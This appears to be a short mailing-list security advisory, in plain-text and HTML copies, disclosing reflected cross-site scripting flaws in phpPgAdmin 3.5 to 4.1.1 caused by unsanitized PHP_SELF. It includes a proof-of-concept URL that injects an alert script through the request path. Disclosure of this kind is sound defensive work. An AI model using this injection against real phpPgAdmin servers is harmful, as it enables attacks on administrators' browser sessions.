------=_Part_25754_4061665.1180272607070
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Synopsis: Multiple XSS Vulnerabilities

Introduction:
phpPgAdmin is a web-based administration tool for PostgreSQL.

Details:
phpPgAdmin doesn't correctly sanitize data in $_SERVER array and most of the
scripts make direct use of PHP_SELF.

PoC:
http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&server=test
This was tested on versions  3.5 to 4.1.1 as not logged user. Other versions
may also be vulnerable.

Regards Michal Majchrowicz.
Hack.pl

------=_Part_25754_4061665.1180272607070
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Synopsis: Multiple XSS Vulnerabilities<br><br>Introduction:<br>phpPgAdmin is a web-based administration tool for PostgreSQL.<br><br>Details:<br>phpPgAdmin doesn&#39;t correctly sanitize data in $_SERVER array and most of the scripts make direct use of PHP_SELF.
<br><br>PoC:<br><a href="http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&amp;server=test">http://www.test.com/redirect.php/%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E?subject=server&amp;server=test
</a><br>This was tested on versions&nbsp; 3.5 to 4.1.1 as not logged user. Other versions may also be vulnerable.<br><br>Regards Michal Majchrowicz.<br>Hack.pl<br>

------=_Part_25754_4061665.1180272607070--